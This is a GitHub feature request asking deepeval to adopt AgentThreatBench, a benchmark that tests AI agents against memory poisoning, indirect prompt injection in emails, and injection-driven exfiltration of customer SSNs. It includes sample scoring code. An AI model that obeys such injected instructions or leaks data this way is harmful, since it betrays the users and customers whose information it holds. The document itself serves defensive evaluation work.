Feature request: Add AgentThreatBench (OWASP Agentic Top 10) as a built-in security benchmark #2681

@vgudur-dev

Summary

AgentThreatBench is the first benchmark suite that operationalizes the OWASP Top 10 for Agentic Applications (2026) into executable evaluation tasks. It has been merged into UKGovernmentBEIS/inspect_evals, the community-contributed evaluation repository for Inspect AI, created in collaboration with the UK AI Security Institute (formerly the UK AI Safety Institute).

What it benchmarks

Three tasks targeting distinct agentic attack surfaces:

  • Memory Poison (ASI06) — Tests whether agents correctly answer questions from a memory store that contains adversarial entries (direct injection, context poisoning, gradual poisoning, authority impersonation, delimiter escape, role hijack)
  • Autonomy Hijack (ASI01) — Tests whether agents performing email triage resist indirect instruction injection embedded in email content returned by tools
  • Data Exfiltration (ASI01) — Tests whether a customer-support agent can be redirected via indirect injection in lookup_customer output into leaking SSNs/account numbers via send_message
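
To make the Data Exfiltration task concrete, here is a minimal sketch of the kind of check such a task implies: scan the agent's tool calls and flag any sensitive value that reaches the outbound tool. This is not AgentThreatBench's actual scorer. `ToolCall`, `leaked_values`, and the sample data are hypothetical names made up for illustration; only `lookup_customer` and `send_message` come from the task description above.

```python
from dataclasses import dataclass


@dataclass
class ToolCall:
    """Hypothetical record of one tool invocation made by the agent."""
    name: str
    arguments: dict


def leaked_values(tool_calls, sensitive_values, sink="send_message"):
    """Return the sensitive values that appear in arguments passed to the sink tool.

    Only calls to `sink` are inspected: reading a record via lookup_customer
    is expected behaviour, sending its contents outward is not.
    """
    leaked = []
    for call in tool_calls:
        if call.name != sink:
            continue
        # Flatten all argument values into one string for a simple substring check.
        payload = " ".join(str(value) for value in call.arguments.values())
        for secret in sensitive_values:
            if secret in payload and secret not in leaked:
                leaked.append(secret)
    return leaked


# Illustrative transcript: the agent was redirected into mailing an SSN.
calls = [
    ToolCall("lookup_customer", {"customer_id": "C-1"}),
    ToolCall("send_message", {"to": "attacker@example.com", "body": "SSN is 123-45-6789"}),
]
secrets = ["123-45-6789", "ACCT-0001"]
print(leaked_values(calls, secrets))
```

A sample would count as secure when the returned list is empty. Substring matching is the simplest possible detector and would miss encoded or paraphrased leaks.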

Scoring approach

AgentThreatBench uses a dual-metric approach: utility (task completion) and security (attack resistance) are scored independently, so a high score on one cannot mask a low score on the other. This maps well to deepeval's metric architecture.
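
As a rough illustration of independent utility and security scoring, the sketch below aggregates per-sample outcomes into two separate rates. It assumes each sample yields two booleans. `SampleResult` and `dual_metric` are hypothetical names and do not reflect the benchmark's or deepeval's actual API.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class SampleResult:
    """Hypothetical per-sample outcome with two independent judgments."""
    task_completed: bool   # utility: did the agent do the legitimate task?
    attack_resisted: bool  # security: did the agent ignore the injected instruction?


def dual_metric(results):
    """Return utility and security as separate rates in [0, 1]."""
    if not results:
        raise ValueError("at least one result is required")
    n = len(results)
    return {
        "utility": sum(r.task_completed for r in results) / n,
        "security": sum(r.attack_resisted for r in results) / n,
    }


results = [
    SampleResult(task_completed=True, attack_resisted=True),
    SampleResult(task_completed=True, attack_resisted=False),
    SampleResult(task_completed=True, attack_resisted=False),
    SampleResult(task_completed=False, attack_resisted=True),
]
scores = dual_metric(results)
print(scores)
```

Keeping the two rates separate, rather than averaging them into one number, preserves the distinction between an agent that refuses everything (secure but useless) and one that completes tasks while following injected instructions (useful but insecure).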

Proposal

Add AgentThreatBench as a built-in security benchmark in deepeval, similar to how deepeval already supports custom red-team metrics. The dataset is open-source.

Benchmark docs: https://ukgovernmentbeis.github.io/inspect_evals/evals/safeguards/agent_threat_bench/
Source: https://github.com/UKGovernmentBEIS/inspect_evals/tree/main/src/inspect_evals/agent_threat_bench
OWASP reference: https://genai.owasp.org/resource/owasp-top-10-for-agentic-applications-for-2026/
